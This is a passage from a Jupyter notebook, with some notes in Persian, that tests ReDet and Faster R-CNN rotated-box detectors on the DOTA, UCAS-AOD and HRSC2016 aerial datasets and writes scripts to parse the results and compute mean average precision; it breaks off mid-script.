"!python /content/ReDet/tools/test.py /content/ReDet/configs/ReDet/ReDet_re50_refpn_1x_dota1.py \\\n /content/ReDet/work_dirs/pth/ReDet_re50_refpn_1x_dota1-a025e6b1.pth --out /content/ReDet/work_dirs/ReDet_re50_refpn_1x_dota1/results.pkl ",
"_____no_output_____"
],
[
"!python /content/ReDet/tools/test.py /content/ReDet/configs/ReDet/ReDet_re50_refpn_1x_dota1.py \\\n /content/ReDet/work_dirs/pth/ReDet_re50_refpn_1x_dota1-a025e6b1.pth --out /content/ReDet/work_dirs/ReDet_re50_refpn_1x_dota1/results.pkl ",
"_____no_output_____"
],
[
"!python /content/ReDet/tools/test.py /content/ReDet/configs/ReDet/ReDet_re50_refpn_1x_dota1.py \\\n /content/ReDet/work_dirs/pth/ReDet_re50_refpn_1x_dota1-a025e6b1.pth --out /content/ReDet/work_dirs/ReDet_re50_refpn_1x_dota1/valresults.pkl ",
"_____no_output_____"
]
],
[
[
"faster_rcnn_RoITrans_r50_fpn_1x_dota test",
"_____no_output_____"
]
],
[
[
"!python /content/ReDet/tools/test.py /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py \\\n /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota/epoch_12.pth --out /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota/results.pkl ",
"_____no_output_____"
],
[
"#new-----dotanew1024\n!python /content/ReDet/tools/test.py /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py \\\n /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota/epoch_12.pth --out /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota/results.pkl ",
"_____no_output_____"
],
[
"#val\n!python /content/ReDet/tools/test.py /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py \\\n /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota/epoch_12.pth --out /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota/valresults.pkl ",
"_____no_output_____"
]
],
[
[
"faster_rcnn_obb_r50_fpn_1x_dota.py test",
"_____no_output_____"
]
],
[
[
"!python /content/ReDet/tools/test.py /content/ReDet/configs/DOTA/faster_rcnn_obb_r50_fpn_1x_dota.py \\\n /content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/epoch_12.pth --out /content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/results.pkl ",
"_____no_output_____"
],
[
"#new-----dotanew1024\n!python /content/ReDet/tools/test.py /content/ReDet/configs/DOTA/faster_rcnn_obb_r50_fpn_1x_dota.py \\\n /content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/epoch_12.pth --out /content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/results.pkl ",
"_____no_output_____"
],
[
"#val\n!python /content/ReDet/tools/test.py /content/ReDet/configs/DOTA/faster_rcnn_obb_r50_fpn_1x_dota.py \\\n /content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/epoch_12.pth --out /content/ReDet/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/valresults.pkl ",
"_____no_output_____"
]
],
[
[
"# faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD **testing**",
"_____no_output_____"
]
],
[
[
"!python /content/ReDet/tools/test.py /content/ReDet/configs/UCAS_AOD/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD.py \\\n /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD/epoch_36.pth --out /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD/results.pkl ",
"_____no_output_____"
]
],
[
[
"# **HSRC2016** ReDet",
"_____no_output_____"
]
],
[
[
"# generate results\n!python /content/ReDet/tools/test.py /content/ReDet/configs/ReDet/ReDet_re50_refpn_3x_hrsc2016.py \\\n /content/ReDet/work_dirs/ReDet_re50_refpn_3x_hrsc2016/ReDet_re50_refpn_3x_hrsc2016-d1b4bd29.pth --out /content/ReDet/work_dirs/ReDet_re50_refpn_3x_hrsc2016/results.pkl\n\n# evaluation\n# remeber to modify the results path in hrsc2016_evaluation.py\n# !python /content/ReDet/DOTA_devkit/hrsc2016_evaluation.py ",
"_____no_output_____"
]
],
[
[
"/content/ReDet/DOTA_devkit/hrsc2016_evaluation.py",
"_____no_output_____"
]
],
[
[
"%%writefile /content/ReDet/DOTA_devkit/hrsc2016_evaluation.py\n\n# --------------------------------------------------------\n# dota_evaluation_task1\n# Licensed under The MIT License [see LICENSE for details]\n# Written by Jian Ding, based on code from Bharath Hariharan\n# --------------------------------------------------------\n\n\"\"\"\n To use the code, users should to config detpath, annopath and imagesetfile\n detpath is the path for 15 result files, for the format, you can refer to \"http://captain.whu.edu.cn/DOTAweb/tasks.html\"\n search for PATH_TO_BE_CONFIGURED to config the paths\n Note, the evaluation is on the large scale images\n\"\"\"\nimport xml.etree.ElementTree as ET\nimport os\n#import cPickle\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport polyiou\nfrom functools import partial\n\ndef parse_gt(filename):\n \"\"\"\n :param filename: ground truth file to parse\n :return: all instances in a picture\n \"\"\"\n objects = []\n with open(filename, 'r') as f:\n while True:\n line = f.readline()\n if line:\n splitlines = line.strip().split(' ')\n object_struct = {}\n if (len(splitlines) < 9):\n continue\n object_struct['name'] = splitlines[8]\n\n if (len(splitlines) == 9):\n object_struct['difficult'] = 0\n elif (len(splitlines) == 10):\n object_struct['difficult'] = int(splitlines[9])\n object_struct['bbox'] = [float(splitlines[0]),\n float(splitlines[1]),\n float(splitlines[2]),\n float(splitlines[3]),\n float(splitlines[4]),\n float(splitlines[5]),\n float(splitlines[6]),\n float(splitlines[7])]\n objects.append(object_struct)\n else:\n break\n return objects\ndef voc_ap(rec, prec, use_07_metric=False):\n \"\"\" ap = voc_ap(rec, prec, [use_07_metric])\n Compute VOC AP given precision and recall.\n If use_07_metric is true, uses the\n VOC 07 11 point method (default:False).\n \"\"\"\n if use_07_metric:\n # 11 point metric\n ap = 0.\n for t in np.arange(0., 1.1, 0.1):\n if np.sum(rec >= t) == 0:\n p = 0\n else:\n p = np.max(prec[rec >= t])\n ap = ap + p / 11.\n else:\n # correct AP calculation\n # first append sentinel values at the end\n mrec = np.concatenate(([0.], rec, [1.]))\n mpre = np.concatenate(([0.], prec, [0.]))\n\n # compute the precision envelope\n for i in range(mpre.size - 1, 0, -1):\n mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])\n\n # to calculate area under PR curve, look for points\n # where X axis (recall) changes value\n i = np.where(mrec[1:] != mrec[:-1])[0]\n\n # and sum (\\Delta recall) * prec\n ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])\n return ap\n\n\ndef voc_eval(detpath,\n annopath,\n imagesetfile,\n classname,\n # cachedir,\n ovthresh=0.5,\n use_07_metric=False):\n \"\"\"rec, prec, ap = voc_eval(detpath,\n annopath,\n imagesetfile,\n classname,\n [ovthresh],\n [use_07_metric])\n Top level function that does the PASCAL VOC evaluation.\n detpath: Path to detections\n detpath.format(classname) should produce the detection results file.\n annopath: Path to annotations\n annopath.format(imagename) should be the xml annotations file.\n imagesetfile: Text file containing the list of images, one image per line.\n classname: Category name (duh)\n cachedir: Directory for caching the annotations\n [ovthresh]: Overlap threshold (default = 0.5)\n [use_07_metric]: Whether to use VOC07's 11 point AP computation\n (default False)\n \"\"\"\n # assumes detections are in detpath.format(classname)\n # assumes annotations are in annopath.format(imagename)\n # assumes imagesetfile is a text file with each line an image name\n # cachedir caches the annotations in a pickle file\n\n # first load gt\n #if not os.path.isdir(cachedir):\n # os.mkdir(cachedir)\n #cachefile = os.path.join(cachedir, 'annots.pkl')\n # read list of images\n with open(imagesetfile, 'r') as f:\n lines = f.readlines()\n imagenames = [x.strip() for x in lines]\n #print('imagenames: ', imagenames)\n #if not os.path.isfile(cachefile):\n # load annots\n recs = {}\n for i, imagename in enumerate(imagenames):\n #print('parse_files name: ', annopath.format(imagename))\n recs[imagename] = parse_gt(annopath.format(imagename))\n #if i % 100 == 0:\n # print ('Reading annotation for {:d}/{:d}'.format(\n # i + 1, len(imagenames)) )\n # save\n #print ('Saving cached annotations to {:s}'.format(cachefile))\n #with open(cachefile, 'w') as f:\n # cPickle.dump(recs, f)\n #else:\n # load\n #with open(cachefile, 'r') as f:\n # recs = cPickle.load(f)\n\n # extract gt objects for this class\n class_recs = {}\n npos = 0\n for imagename in imagenames:\n R = [obj for obj in recs[imagename] if obj['name'] == classname]\n bbox = np.array([x['bbox'] for x in R])\n difficult = np.array([x['difficult'] for x in R]).astype(np.bool)\n det = [False] * len(R)\n npos = npos + sum(~difficult)\n class_recs[imagename] = {'bbox': bbox,\n 'difficult': difficult,\n 'det': det}\n\n # read dets from Task1* files\n detfile = detpath.format(classname)\n with open(detfile, 'r') as f:\n lines = f.readlines()\n\n splitlines = [x.strip().split(' ') for x in lines]\n image_ids = [x[0] for x in splitlines]\n confidence = np.array([float(x[1]) for x in splitlines])\n\n #print('check confidence: ', confidence)\n\n BB = np.array([[float(z) for z in x[2:]] for x in splitlines])\n\n # sort by confidence\n sorted_ind = np.argsort(-confidence)\n sorted_scores = np.sort(-confidence)\n\n #print('check sorted_scores: ', sorted_scores)\n #print('check sorted_ind: ', sorted_ind)\n\n ## note the usage only in numpy not for list\n BB = BB[sorted_ind, :]\n image_ids = [image_ids[x] for x in sorted_ind]\n #print('check imge_ids: ', image_ids)\n #print('imge_ids len:', len(image_ids))\n # go down dets and mark TPs and FPs\n nd = len(image_ids)\n tp = np.zeros(nd)\n fp = np.zeros(nd)\n for d in range(nd):\n ##############################################################################################################\n filename, file_extension = os.path.splitext(image_ids[d])\n R = class_recs[ filename]\n # R = class_recs[image_ids[d]]##############################################################################\n\n bb = BB[d, :].astype(float)\n ovmax = -np.inf\n BBGT = R['bbox'].astype(float)\n\n ## compute det bb with each BBGT\n\n if BBGT.size > 0:\n # compute overlaps\n # intersection\n\n # 1. calculate the overlaps between hbbs, if the iou between hbbs are 0, the iou between obbs are 0, too.\n # pdb.set_trace()\n BBGT_xmin = np.min(BBGT[:, 0::2], axis=1)\n BBGT_ymin = np.min(BBGT[:, 1::2], axis=1)\n BBGT_xmax = np.max(BBGT[:, 0::2], axis=1)\n BBGT_ymax = np.max(BBGT[:, 1::2], axis=1)\n bb_xmin = np.min(bb[0::2])\n bb_ymin = np.min(bb[1::2])\n bb_xmax = np.max(bb[0::2])\n bb_ymax = np.max(bb[1::2])\n\n ixmin = np.maximum(BBGT_xmin, bb_xmin)\n iymin = np.maximum(BBGT_ymin, bb_ymin)\n ixmax = np.minimum(BBGT_xmax, bb_xmax)\n iymax = np.minimum(BBGT_ymax, bb_ymax)\n iw = np.maximum(ixmax - ixmin + 1., 0.)\n ih = np.maximum(iymax - iymin + 1., 0.)\n inters = iw * ih\n\n # union\n uni = ((bb_xmax - bb_xmin + 1.) * (bb_ymax - bb_ymin + 1.) +\n (BBGT_xmax - BBGT_xmin + 1.) *\n (BBGT_ymax - BBGT_ymin + 1.) - inters)\n\n overlaps = inters / uni\n\n BBGT_keep_mask = overlaps > 0\n BBGT_keep = BBGT[BBGT_keep_mask, :]\n BBGT_keep_index = np.where(overlaps > 0)[0]\n # pdb.set_trace()\n def calcoverlaps(BBGT_keep, bb):\n overlaps = []\n for index, GT in enumerate(BBGT_keep):\n\n overlap = polyiou.iou_poly(polyiou.VectorDouble(BBGT_keep[index]), polyiou.VectorDouble(bb))\n overlaps.append(overlap)\n return overlaps\n if len(BBGT_keep) > 0:\n overlaps = calcoverlaps(BBGT_keep, bb)\n\n ovmax = np.max(overlaps)\n jmax = np.argmax(overlaps)\n # pdb.set_trace()\n jmax = BBGT_keep_index[jmax]\n\n if ovmax > ovthresh:\n if not R['difficult'][jmax]:\n if not R['det'][jmax]:\n tp[d] = 1.\n R['det'][jmax] = 1\n else:\n fp[d] = 1.\n else:\n fp[d] = 1.\n\n # compute precision recall\n\n print('check fp:', fp)\n print('check tp', tp)\n\n\n print('npos num:', npos)\n fp = np.cumsum(fp)\n tp = np.cumsum(tp)\n\n rec = tp / float(npos)\n # avoid divide by zero in case the first detection matches a difficult\n # ground truth\n prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)\n ap = voc_ap(rec, prec, use_07_metric)\n\n return rec, prec, ap\n\ndef main():\n \n detpath = r'/content/ReDet/work_dirs/ReDet_re50_refpn_3x_hrsc2016/Task1_{:s}.txt'\n annopath = r'/content/ReDet/data/HRSC2016/Test/labelTxt/{:s}.txt' # change the directory to the path of val/labelTxt, if you want to do evaluation on the valset\n imagesetfile = r'/content/ReDet/data/HRSC2016/Test/test.txt'\n\n\n # For HRSC2016\n classnames = ['ship']\n classaps = []\n map = 0\n for classname in classnames:\n print('classname:', classname)\n rec, prec, ap = voc_eval(detpath,\n annopath,\n imagesetfile,\n classname,\n ovthresh=0.5,\n use_07_metric=True)\n map = map + ap\n #print('rec: ', rec, 'prec: ', prec, 'ap: ', ap)\n print('ap: ', ap)\n classaps.append(ap)\n\n # umcomment to show p-r curve of each category\n # plt.figure(figsize=(8,4))\n # plt.xlabel('recall')\n # plt.ylabel('precision')\n # plt.plot(rec, prec)\n # plt.show()\n map = map/len(classnames)\n print('map:', map)\n classaps = 100*np.array(classaps)\n print('classaps: ', classaps)\nif __name__ == '__main__':\n main()",
"_____no_output_____"
],
[
"# evaluation\n# remeber to modify the results path in hrsc2016_evaluation.py\n!python /content/ReDet/DOTA_devkit/hrsc2016_evaluation.py",
"_____no_output_____"
]
],
[
[
"# برای پارس کردن فایل **ولیدیشن** کد زیر اجرا شود",
"_____no_output_____"
]
],
[
[
"# %pycat /content/AerialDetection/tools/parse_results.py\n%%writefile /content/ReDet/tools/parse_results.py\n\nfrom __future__ import division\n\nimport argparse\nimport os.path as osp\nimport shutil\nimport tempfile\n\nimport mmcv\nfrom mmdet.apis import init_dist\nfrom mmdet.core import results2json, coco_eval, \\\n HBBSeg2Comp4, OBBDet2Comp4, OBBDetComp4, \\\n HBBOBB2Comp4, HBBDet2Comp4\n\nimport argparse\n\nfrom mmdet import __version__\nfrom mmdet.datasets import get_dataset\nfrom mmdet.apis import (train_detector, init_dist, get_root_logger,\n set_random_seed)\nfrom mmdet.models import build_detector\nimport torch\nimport json\nfrom mmcv import Config\nimport sys\n# sys.path.insert(0, '../')\n# import DOTA_devkit.ResultMerge_multi_process as RM\nfrom DOTA_devkit.ResultMerge_multi_process import *\n# import pdb; pdb.set_trace()\ndef parse_args():\n parser = argparse.ArgumentParser(description='Train a detector')\n parser.add_argument('--config', default='configs/DOTA/faster_rcnn_r101_fpn_1x_dota2_v3_RoITrans_v5.py')\n parser.add_argument('--type', default=r'HBB',\n help='parse type of detector')\n args = parser.parse_args()\n\n return args\n\ndef OBB2HBB(srcpath, dstpath):\n filenames = util.GetFileFromThisRootDir(srcpath)\n if not os.path.exists(dstpath):\n os.makedirs(dstpath)\n for file in filenames:\n with open(file, 'r') as f_in:\n with open(os.path.join(dstpath, os.path.basename(os.path.splitext(file)[0]) + '.txt'), 'w') as f_out:\n lines = f_in.readlines()\n splitlines = [x.strip().split() for x in lines]\n for index, splitline in enumerate(splitlines):\n imgname = splitline[0]\n score = splitline[1]\n poly = splitline[2:]\n poly = list(map(float, poly))\n xmin, xmax, ymin, ymax = min(poly[0::2]), max(poly[0::2]), min(poly[1::2]), max(poly[1::2])\n rec_poly = [xmin, ymin, xmax, ymax]\n outline = imgname + ' ' + score + ' ' + ' '.join(map(str, rec_poly))\n if index != (len(splitlines) - 1):\n outline = outline + '\\n'\n f_out.write(outline)\n\ndef parse_results(config_file, resultfile, dstpath, type):\n cfg = Config.fromfile(config_file)\n\n data_test = cfg.data['test']\n dataset = get_dataset(data_test)\n outputs = mmcv.load(resultfile)\n if type == 'OBB':\n # dota1 has tested\n \n obb_results_dict = OBBDetComp4(dataset, outputs)\n current_thresh = 0.1\n elif type == 'HBB':\n # dota1 has tested\n hbb_results_dict = HBBDet2Comp4(dataset, outputs)\n elif type == 'HBBOBB':\n # dota1 has tested\n # dota2\n hbb_results_dict, obb_results_dict = HBBOBB2Comp4(dataset, outputs)\n current_thresh = 0.3\n elif type == 'Mask':\n # TODO: dota1 did not pass\n # dota2, hbb has passed, obb has passed\n hbb_results_dict, obb_results_dict = HBBSeg2Comp4(dataset, outputs)\n current_thresh = 0.3\n\n dataset_type = cfg.dataset_type\n\n if 'obb_results_dict' in vars():\n if not os.path.exists(os.path.join(dstpath, 'Task1_results')):\n os.makedirs(os.path.join(dstpath, 'Task1_results'))\n\n for cls in obb_results_dict:\n with open(os.path.join(dstpath, 'Task1_results', cls + '.txt'), 'w') as obb_f_out:\n for index, outline in enumerate(obb_results_dict[cls]):\n if index != (len(obb_results_dict[cls]) - 1):\n obb_f_out.write(outline + '\\n')\n else:\n obb_f_out.write(outline)\n\n if not os.path.exists(os.path.join(dstpath, 'Task1_results_nms')):\n os.makedirs(os.path.join(dstpath, 'Task1_results_nms'))\n\n mergebypoly_multiprocess(os.path.join(dstpath, 'Task1_results'),\n os.path.join(dstpath, 'Task1_results_nms'), nms_type=r'py_cpu_nms_poly_fast', o_thresh=current_thresh)\n\n OBB2HBB(os.path.join(dstpath, 'Task1_results_nms'),\n os.path.join(dstpath, 'Transed_Task2_results_nms'))\n\n if 'hbb_results_dict' in vars():\n if not os.path.exists(os.path.join(dstpath, 'Task2_results')):\n os.makedirs(os.path.join(dstpath, 'Task2_results'))\n for cls in hbb_results_dict:\n with open(os.path.join(dstpath, 'Task2_results', cls + '.txt'), 'w') as f_out:\n for index, outline in enumerate(hbb_results_dict[cls]):\n if index != (len(hbb_results_dict[cls]) - 1):\n f_out.write(outline + '\\n')\n else:\n f_out.write(outline)\n\n if not os.path.exists(os.path.join(dstpath, 'Task2_results_nms')):\n os.makedirs(os.path.join(dstpath, 'Task2_results_nms'))\n mergebyrec(os.path.join(dstpath, 'Task2_results'),\n os.path.join(dstpath, 'Task2_results_nms'))\n\nif __name__ == '__main__':\n args = parse_args()\n config_file = args.config\n config_name = os.path.splitext(os.path.basename(config_file))[0]\n\n ######################################################################################/content/AerialDetection/work_dirs\n # pkl_file = os.path.join('/content/ReDet/work_dirs', config_name, 'results.pkl')\n pkl_file = os.path.join('/content/ReDet/work_dirs', config_name, 'valresults.pkl')\n output_path = os.path.join('/content/ReDet/work_dirs', config_name)\n type = args.type\n parse_results(config_file, pkl_file, output_path, type)",
"_____no_output_____"
]
],
[
[
"# به کمک دستورات زیر از فایل تولید شدهی سریالایز شده سه فلدر پارس شده دریافت میشود",
"_____no_output_____"
]
],
[
[
"!python /content/ReDet/tools/parse_results.py --config /content/ReDet/configs/UCAS_AOD/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD.py --type OBB",
"_____no_output_____"
]
],
[
[
"باید دانلود شده زیپ شده و آپلود شود Task1_results_nms برای ارزیابی تسک اول فایل ",
"_____no_output_____"
]
],
[
[
"#!tar -cvf '/content/ReDet/work_dirs/ReDet_re50_refpn_1x_dota1/Task1_results_nms.tar' '/content/ReDet/work_dirs/ReDet_re50_refpn_1x_dota1/Task1_results_nms'",
"_____no_output_____"
]
],
[
[
"# ارزیابی val",
"_____no_output_____"
]
],
[
[
"import glob\nimport os\n\nos.chdir(r'/content/ReDet/data/dota/val/images')\n# myFiles = glob.glob('*.bmp')\n%ls -1 | sed 's/\\.png//g' > ./testset.txt\n# print(myFiles)\n!mv '/content/ReDet/data/dota/val/images/testset.txt' '/content/ReDet/data/dota/val'",
"_____no_output_____"
],
[
"%%writefile /content/ReDet/DOTA_devkit/dota_evaluation_task1.py\n\nimport os\nimport xml.etree.ElementTree as ET\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\nsys.path.insert(1,os.path.dirname(__file__))\nimport polyiou\nimport argparse\n\n\ndef parse_gt(filename):\n \"\"\"\n :param filename: ground truth file to parse\n :return: all instances in a picture\n \"\"\"\n objects = []\n with open(filename, 'r') as f:\n while True:\n line = f.readline()\n if line:\n splitlines = line.strip().split(' ')\n object_struct = {}\n if (len(splitlines) < 9):\n continue\n object_struct['name'] = splitlines[8]\n\n if (len(splitlines) == 9):\n object_struct['difficult'] = 0\n elif (len(splitlines) == 10):\n object_struct['difficult'] = int(splitlines[9])\n object_struct['bbox'] = [float(splitlines[0]),\n float(splitlines[1]),\n float(splitlines[2]),\n float(splitlines[3]),\n float(splitlines[4]),\n float(splitlines[5]),\n float(splitlines[6]),\n float(splitlines[7])]\n objects.append(object_struct)\n else:\n break\n return objects\n\n\ndef voc_ap(rec, prec, use_07_metric=False):\n \"\"\" ap = voc_ap(rec, prec, [use_07_metric])\n Compute VOC AP given precision and recall.\n If use_07_metric is true, uses the\n VOC 07 11 point method (default:False).\n \"\"\"\n if use_07_metric:\n # 11 point metric\n ap = 0.\n for t in np.arange(0., 1.1, 0.1):\n if np.sum(rec >= t) == 0:\n p = 0\n else:\n p = np.max(prec[rec >= t])\n ap = ap + p / 11.\n else:\n # correct AP calculation\n # first append sentinel values at the end\n mrec = np.concatenate(([0.], rec, [1.]))\n mpre = np.concatenate(([0.], prec, [0.]))\n\n # compute the precision envelope\n for i in range(mpre.size - 1, 0, -1):\n mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])\n\n # to calculate area under PR curve, look for points\n # where X axis (recall) changes value\n i = np.where(mrec[1:] != mrec[:-1])[0]\n\n # and sum (\\Delta recall) * prec\n ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])\n return ap\n\n\ndef voc_eval(detpath,\n annopath,\n imagesetfile,\n classname,\n # cachedir,\n ovthresh=0.5,\n use_07_metric=False):\n \"\"\"rec, prec, ap = voc_eval(detpath,\n annopath,\n imagesetfile,\n classname,\n [ovthresh],\n [use_07_metric])\n Top level function that does the PASCAL VOC evaluation.\n detpath: Path to detections\n detpath.format(classname) should produce the detection results file.\n annopath: Path to annotations\n annopath.format(imagename) should be the xml annotations file.\n imagesetfile: Text file containing the list of images, one image per line.\n classname: Category name (duh)\n cachedir: Directory for caching the annotations\n [ovthresh]: Overlap threshold (default = 0.5)\n [use_07_metric]: Whether to use VOC07's 11 point AP computation\n (default False)\n \"\"\"\n # assumes detections are in detpath.format(classname)\n # assumes annotations are in annopath.format(imagename)\n # assumes imagesetfile is a text file with each line an image name\n # cachedir caches the annotations in a pickle file\n\n # read list of images\n with open(imagesetfile, 'r') as f:\n lines = f.readlines()\n imagenames = [x.strip() for x in lines]\n\n recs = {}\n for i, imagename in enumerate(imagenames):\n ##############################################################################################################\n # print('parse_files name: ', annopath.format(imagename))\n recs[imagename] = parse_gt(annopath.format(imagename))\n\n # extract gt objects for this class\n class_recs = {}\n npos = 0\n for imagename in imagenames:\n R = [obj for obj in recs[imagename] if obj['name'] == classname]\n bbox = np.array([x['bbox'] for x in R])\n difficult = np.array([x['difficult'] for x in R]).astype(np.bool)\n det = [False] * len(R)\n npos = npos + sum(~difficult)\n class_recs[imagename] = {'bbox': bbox,\n 'difficult': difficult,\n 'det': det}\n\n # read dets from Task1* files\n detfile = detpath.format(classname)\n with open(detfile, 'r') as f:\n lines = f.readlines()\n\n splitlines = [x.strip().split(' ') for x in lines]\n image_ids = [x[0] for x in splitlines]\n confidence = np.array([float(x[1]) for x in splitlines])\n\n BB = np.array([[float(z) for z in x[2:]] for x in splitlines])\n\n # sort by confidence\n sorted_ind = np.argsort(-confidence)\n sorted_scores = np.sort(-confidence)\n\n # note the usage only in numpy not for list\n BB = BB[sorted_ind, :]\n image_ids = [image_ids[x] for x in sorted_ind]\n # go down dets and mark TPs and FPs\n nd = len(image_ids)\n tp = np.zeros(nd)\n fp = np.zeros(nd)\n for d in range(nd):\n R = class_recs[image_ids[d]]\n bb = BB[d, :].astype(float)\n ovmax = -np.inf\n BBGT = R['bbox'].astype(float)\n\n # compute det bb with each BBGT\n if BBGT.size > 0:\n # compute overlaps\n # intersection\n\n # 1. calculate the overlaps between hbbs, if the iou between hbbs are 0, the iou between obbs are 0, too.\n BBGT_xmin = np.min(BBGT[:, 0::2], axis=1)\n BBGT_ymin = np.min(BBGT[:, 1::2], axis=1)\n BBGT_xmax = np.max(BBGT[:, 0::2], axis=1)\n BBGT_ymax = np.max(BBGT[:, 1::2], axis=1)\n bb_xmin = np.min(bb[0::2])\n bb_ymin = np.min(bb[1::2])\n bb_xmax = np.max(bb[0::2])\n bb_ymax = np.max(bb[1::2])\n\n ixmin = np.maximum(BBGT_xmin, bb_xmin)\n iymin = np.maximum(BBGT_ymin, bb_ymin)\n ixmax = np.minimum(BBGT_xmax, bb_xmax)\n iymax = np.minimum(BBGT_ymax, bb_ymax)\n iw = np.maximum(ixmax - ixmin + 1., 0.)\n ih = np.maximum(iymax - iymin + 1., 0.)\n inters = iw * ih\n\n # union\n uni = ((bb_xmax - bb_xmin + 1.) * (bb_ymax - bb_ymin + 1.) +\n (BBGT_xmax - BBGT_xmin + 1.) *\n (BBGT_ymax - BBGT_ymin + 1.) - inters)\n\n overlaps = inters / uni\n\n BBGT_keep_mask = overlaps > 0\n BBGT_keep = BBGT[BBGT_keep_mask, :]\n BBGT_keep_index = np.where(overlaps > 0)[0]\n\n def calcoverlaps(BBGT_keep, bb):\n overlaps = []\n for index, GT in enumerate(BBGT_keep):\n\n overlap = polyiou.iou_poly(polyiou.VectorDouble(\n BBGT_keep[index]), polyiou.VectorDouble(bb))\n overlaps.append(overlap)\n return overlaps\n if len(BBGT_keep) > 0:\n overlaps = calcoverlaps(BBGT_keep, bb)\n\n ovmax = np.max(overlaps)\n jmax = np.argmax(overlaps)\n # pdb.set_trace()\n jmax = BBGT_keep_index[jmax]\n\n if ovmax > ovthresh:\n if not R['difficult'][jmax]:\n if not R['det'][jmax]:\n tp[d] = 1.\n R['det'][jmax] = 1\n else:\n fp[d] = 1.\n else:\n fp[d] = 1.\n\n # compute precision recall\n\n print('check fp:', fp)\n print('check tp', tp)\n\n print('npos num:', npos)\n fp = np.cumsum(fp)\n tp = np.cumsum(tp)\n\n rec = tp / float(npos)\n # avoid divide by zero in case the first detection matches a difficult\n # ground truth\n prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)\n ap = voc_ap(rec, prec, use_07_metric)\n\n return rec, prec, ap\n\n\ndef dota_task1_eval(work_dir, det_dir):\n detpath = os.path.join(det_dir, r'Task1_{:s}.txt')\n annopath = r'data/dota/test/OrientlabelTxt-utf-8/{:s}.txt'\n imagesetfile = r'data/dota/test/testset.txt'\n # For DOTA-v1.0\n classnames = ['plane', 'baseball-diamond', 'bridge', 'ground-track-field', 'small-vehicle', 'large-vehicle', 'ship', 'tennis-court',\n 'basketball-court', 'storage-tank', 'soccer-ball-field', 'roundabout', 'harbor', 'swimming-pool', 'helicopter']\n classaps = []\n map = 0\n for classname in classnames:\n print('classname:', classname)\n rec, prec, ap = voc_eval(detpath,\n annopath,\n imagesetfile,\n classname,\n ovthresh=0.5,\n use_07_metric=True)\n map = map + ap\n #print('rec: ', rec, 'prec: ', prec, 'ap: ', ap)\n print('ap: ', ap)\n classaps.append(ap)\n map = map/len(classnames)\n print('map:', map)\n classaps = 100*np.array(classaps)\n print('classaps: ', classaps)\n # writing results to txt file\n with open(os.path.join(work_dir, 'Task1_results.txt'), 'w') as f:\n out_str = ''\n out_str += 'mAP:'+str(map)+'\\n'\n out_str += 'APs:\\n'\n out_str += ' '.join([str(ap)for ap in classaps.tolist()])\n f.write(out_str)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--work_dir',default='')\n return parser.parse_args()\n\ndef main():\n args = parse_args()\n # detpath = os.path.join(args.work_dir,'Task1_results_nms/Task1_{:s}.txt')\n detpath = os.path.join(args.work_dir,'Task1_results_nms/{:s}.txt')\n ###################################################################################################################\n # change the directory to the path of val/labelTxt, if you want to do evaluation on the valset\n # annopath = r'data/dota/test/OrientlabelTxt-utf-8/{:s}.txt'\n # imagesetfile = r'data/dota/test/testset.txt'\n annopath = r'/content/ReDet/data/dota/val/labelTxt/{:s}.txt'\n imagesetfile = r'/content/ReDet/data/dota/val/testset.txt'\n\n # For DOTA-v1.5\n # classnames = ['plane', 'baseball-diamond', 'bridge', 'ground-track-field', 'small-vehicle', 'large-vehicle', 'ship', 'tennis-court',\n # 'basketball-court', 'storage-tank', 'soccer-ball-field', 'roundabout', 'harbor', 'swimming-pool', 'helicopter', 'container-crane']\n # For DOTA-v1.0\n classnames = ['plane', 'baseball-diamond', 'bridge', 'ground-track-field', 'small-vehicle', 'large-vehicle', 'ship', 'tennis-court',\n 'basketball-court', 'storage-tank', 'soccer-ball-field', 'roundabout', 'harbor', 'swimming-pool', 'helicopter']\n classaps = []\n map = 0\n for classname in classnames:\n print('classname:', classname)\n rec, prec, ap = voc_eval(detpath,\n annopath,\n imagesetfile,\n classname,\n ovthresh=0.5,\n use_07_metric=True)\n map = map + ap\n #print('rec: ', rec, 'prec: ', prec, 'ap: ', ap)\n print('ap: ', ap)\n classaps.append(ap)\n\n # # umcomment to show p-r curve of each category\n # plt.figure(figsize=(8,4))\n # plt.xlabel('Recall')\n # plt.ylabel('Precision')\n # plt.xticks(fontsize=11)\n # plt.yticks(fontsize=11)\n # plt.xlim(0, 1)\n # plt.ylim(0, 1)\n # ax = plt.gca()\n # ax.spines['top'].set_color('none')\n # ax.spines['right'].set_color('none')\n # plt.plot(rec, prec)\n # # plt.show()\n # plt.savefig('pr_curve/{}.png'.format(classname))\n map = map/len(classnames)\n print('map:', map)\n classaps = 100*np.array(classaps)\n print('classaps: ', 